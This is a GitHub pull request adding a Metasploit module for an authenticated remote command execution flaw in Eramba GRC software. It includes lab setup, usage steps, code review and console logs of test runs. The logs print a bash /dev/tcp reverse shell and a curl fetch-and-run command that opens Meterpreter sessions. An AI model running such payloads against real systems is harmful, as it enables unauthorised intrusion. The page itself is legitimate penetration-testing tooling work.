Eramba RCE #19957

Merged (7 commits) on Mar 25, 2025

Conversation

@msutovsky-r7 (Contributor) commented Mar 13, 2025

This PR adds a module for CVE-2023-36255 - Eramba Remote Command Execution. It is built on #19494; this is basically just doing the last steps.

Vulnerable Application

Eramba is open and free GRC software, used by many companies. It offers mainly a risk management solution. Versions up to 3.19.1 are vulnerable to authenticated remote command execution. It is necessary to provide valid credentials. The application allows executing arbitrary OS commands, which can lead to remote access. The application is available in Docker format. However, after installation, debug mode needs to be enabled. Here's a modified Docker Compose file for simpler testing (docker-compose.simple-install.yml):

Installation

Docker and docker-compose are required.

  1. git clone https://github.com/eramba/docker
  2. cd docker
  3. Setup database credentials and public URL in .env
  4. Copy the following into docker-compose.simple-install.yml:

```yaml
version: '3.19'
services:
  mysql:
    container_name: mysql
    image: mysql:8.0.28-oracle
    command: ["mysqld", "--disable-log-bin"]
    restart: always
    volumes:
      - db-data:/var/lib/mysql
      - ./mysql/conf.d:/etc/mysql/conf.d
      - ./mysql/entrypoint:/docker-entrypoint-initdb.d
    environment:
      MYSQL_DATABASE: ${DB_DATABASE}
      MYSQL_USER: ${DB_USERNAME}
      MYSQL_PASSWORD: ${DB_PASSWORD}
      MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
  redis:
    container_name: redis
    image: redis:6.0.16-alpine
    restart: always
  eramba:
    container_name: eramba
    image: ghcr.io/eramba/eramba:3.19.1
    restart: always
    ports:
      - 8443:443
    volumes:
      - data:/var/www/eramba/app/upgrade/data
      - app:/var/www/eramba
      - logs:/var/www/eramba/app/upgrade/logs
      - ./apache/ssl/mycert.crt:/etc/ssl/certs/mycert.crt
      - ./apache/ssl/mycert.key:/etc/ssl/private/mycert.key
      - ./apache/security.conf:/etc/apache2/conf-available/security.conf
      - ./apache/ports.conf:/etc/apache2/ports.conf
      - ./apache/vhost-ssl.conf:/etc/apache2/sites-available/000-default.conf
      - ./crontab/crontab:/etc/cron.d/eramba-crontab
    environment:
      DB_HOST: ${DB_HOST}
      DB_DATABASE: ${DB_DATABASE}
      DB_USERNAME: ${DB_USERNAME}
      DB_PASSWORD: ${DB_PASSWORD}
      CACHE_URL: ${CACHE_URL}
      USE_PROXY: ${USE_PROXY}
      PROXY_HOST: ${PROXY_HOST}
      PROXY_PORT: ${PROXY_PORT}
      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
    links:
      - mysql
      - redis
    depends_on:
      - mysql
  cron:
    container_name: cron
    image: ghcr.io/eramba/eramba:3.19.1
    command: ["cron", "-f"]
    entrypoint: ["/docker-cron-entrypoint.sh"]
    restart: always
    volumes:
      - data:/var/www/eramba/app/upgrade/data
      - app:/var/www/eramba
      - logs:/var/www/eramba/app/upgrade/logs
      - ./docker-cron-entrypoint.sh:/docker-cron-entrypoint.sh
      - ./crontab/crontab:/etc/cron.d/eramba-crontab
      - .env:/var/www/docker.env
    environment:
      DB_HOST: ${DB_HOST}
      DB_DATABASE: ${DB_DATABASE}
      DB_USERNAME: ${DB_USERNAME}
      DB_PASSWORD: ${DB_PASSWORD}
      CACHE_URL: ${CACHE_URL}
      USE_PROXY: ${USE_PROXY}
      PROXY_HOST: ${PROXY_HOST}
      PROXY_PORT: ${PROXY_PORT}
      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
    links:
      - mysql
      - redis
      - eramba
    depends_on:
      - eramba
volumes:
  app:
  data:
  logs:
  db-data:
```

  5. docker compose -f docker-compose.simple-install.yml up -d

Shut down: docker compose -f docker-compose.simple-install.yml down

Verification Steps

  1. use exploit/linux/http/eramba_rce
  2. set RHOSTS [target IP]
  3. set LHOST [attacker's IP]
  4. set USERNAME [username]
  5. set PASSWORD [password]
  6. exploit

Options

USERNAME

A valid username for Eramba application

PASSWORD

A valid password for Eramba application

Scenarios

```
msf6 > use exploit/linux/http/eramba_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/eramba_rce)> set RHOSTS 192.168.95.145
RHOSTS => 192.168.95.145
msf6 exploit(linux/http/eramba_rce)> set LHOST 192.168.95.142
LHOST => 192.168.95.142
msf6 exploit(linux/http/eramba_rce)> set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/eramba_rce)> set PASSWORD P4ssw0rd!
PASSWORD => P4ssw0rd!
msf6 exploit(linux/http/eramba_rce) > exploit
[*] Started reverse TCP handler on 192.168.95.142:4444 
[*] Command shell session 1 opened (192.168.95.142:4444 -> 192.168.95.145:38460) at 2025-03-13 12:31:26 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Mar 20, 2025
Review comment on lines 112 to 115 (Contributor):

```markdown
## Options

- **USERNAME**: valid username for Eramba application (default: admin)
- **PASSWORD**: valid password for Eramba application (default: admin)
```

Options typically use H3.

Suggested change (replacing the lines above):

```markdown
## Options
### USERNAME
A valid username for Eramba application
### PASSWORD
A valid password for Eramba application
```
Review comment on lines 68 to 69 (Contributor):

```ruby
OptString.new('USERNAME', [ true, 'The username to authenticate with']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
```

The docs noted that there was a default username and password, but it's not used here.

Review comment on lines 88 to 90 (Contributor):

```ruby
return Exploit::CheckCode::Appears if version <= Rex::Version.new('3.19.1')

return Exploit::CheckCode::Safe
```

Can we add the version to the check code here? That'll be useful for debugging.

Suggested change (replacing the lines above):

```ruby
return Exploit::CheckCode::Appears("Eramba Version #{version} is affected.") if version <= Rex::Version.new('3.19.1')
return Exploit::CheckCode::Safe("Eramba Version #{version} is not affected.")
```
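A stand-alone version of the check logic discussed in this comment, added here as an example rather than code from the module or from Rapid7. It keeps the reviewer's point that the detected version belongs in the check message, so a scan or inventory log explains itself, and it also covers the case the snippet does not show: input from which no version can be parsed. Ruby's standard-library Gem::Version stands in for Rex::Version (assumed to compare dotted versions numerically in the same way, so 3.19.10 sorts above 3.19.1); the version regex, the constructed inventory lines and the :unknown result are this example's own assumptions.

```ruby
# Added example, not the Metasploit module's own code.
# Gem::Version (standard library) is used in place of Rex::Version; the
# cut-off 3.19.1 is the one used by the module's check method on this page.
require 'rubygems'

LAST_AFFECTED_VERSION = Gem::Version.new('3.19.1')

CheckResult = Struct.new(:code, :message)

# Pull a dotted version (2 to 4 components) out of free text such as a
# page footer or an inventory record. Returns nil when none is present.
# The regex is an assumption of this example, not the module's.
def extract_version(text)
  m = text.match(/(\d+(?:\.\d+){1,3})(?![\d.])/)
  m && m[1]
end

# Mirror of the suggested check code: versions <= 3.19.1 are reported as
# appearing vulnerable, newer ones as safe, and unparsable input as
# unknown. The version is carried in every message for debugging, which is
# the reviewer's suggestion above.
def eramba_check(text)
  version = extract_version(text)
  return CheckResult.new(:unknown, 'Could not determine the Eramba version.') if version.nil?

  if Gem::Version.new(version) <= LAST_AFFECTED_VERSION
    CheckResult.new(:appears, "Eramba Version #{version} is affected.")
  else
    CheckResult.new(:safe, "Eramba Version #{version} is not affected.")
  end
end

# Constructed sample inventory lines (hostnames and versions are made up).
SAMPLE_INVENTORY = [
  'grc-prod   eramba 3.19.1',
  'grc-test   eramba 3.19.10',
  'grc-legacy eramba 3.18.0',
  'grc-new    eramba 3.20.0',
  'grc-unk    eramba (version not reported)'
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_INVENTORY.each do |line|
    r = eramba_check(line)
    puts "#{line.split.first}: #{r.code} - #{r.message}"
  end
end
```

The 3.19.10 line is the reason to compare parsed versions rather than strings: a string comparison would rank "3.19.10" below "3.19.1" and report a fixed build as affected.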

@smcintyre-r7 smcintyre-r7 self-assigned this Mar 20, 2025
@smcintyre-r7 smcintyre-r7 moved this from Todo to In Progress in Metasploit Kanban Mar 20, 2025
Review comment on lines 38 to 44 (Contributor):

```ruby
'Targets' => [
  [
    'Unix Command',
    {
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Type' => :unix_cmd,
```

This is filtering out fetch payloads. The docker container has curl and wget installed and I was able to test cmd/linux/http/x64/meterpreter/reverse_tcp using curl but had to make these changes:

Suggested change (replacing the lines above):

```ruby
'Targets' => [
  [
    'Command',
    {
      'Platform' => ['unix', 'linux'],
      'Arch' => ARCH_CMD,
```
@github-project-automation github-project-automation bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban Mar 20, 2025
@smcintyre-r7 (Contributor) left a comment:

LGTM, I was able to successfully test both payloads now.

```
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > show options 

Module options (exploit/linux/http/eramba_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                         ing-metasploit.html
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Eramba
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Command



View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[+] bash -c '0<&31-;exec 31<>/dev/tcp/192.168.159.128/4444;sh <&31 >&31 2>&31'
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to login
[*] Exploit completed, but no session was created.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[+] bash -c '0<&172-;exec 172<>/dev/tcp/192.168.159.128/4444;sh <&172 >&172 2>&172'
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.128:47214) at 2025-03-25 13:51:46 -0400
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.159.128 - Command shell session 1 closed.  Reason: User exit
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set PAYLOAD  cmd/linux/http/x64/meterpreter/reverse_tcp 
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[*] Command to run on remote host: curl -so /tmp/YVjzJlhFY http://192.168.159.128:8080/jvE_gjDKxuQo86-91TitNQ;chmod +x /tmp/YVjzJlhFY;/tmp/YVjzJlhFY&
[*] Fetch handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /jvE_gjDKxuQo86-91TitNQ
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[*] Client 192.168.159.128 requested /jvE_gjDKxuQo86-91TitNQ
[*] Sending payload to 192.168.159.128 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:51982) at 2025-03-25 13:52:33 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 10.89.4.4
OS           : Debian 11.6 (Linux 6.13.7-100.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/eramba/app/upgrade/webroot
meterpreter >
```

@github-project-automation github-project-automation bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban Mar 25, 2025
@smcintyre-r7 smcintyre-r7 merged commit bf1f919 into rapid7:master Mar 25, 2025
18 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Mar 25, 2025
@smcintyre-r7 (Contributor) commented:

Release Notes

This adds an exploit for CVE-2023-36255 which is an authenticated command injection vulnerability in Eramba.

@msutovsky-r7 msutovsky-r7 changed the title Auxmodule eramba update Eramba RCE Apr 1, 2025
@trvnt-stefan (Contributor) commented:

Thanks to @msutovsky-r7 and @smcintyre-r7 for completing our initial pull request (#19494). 👍
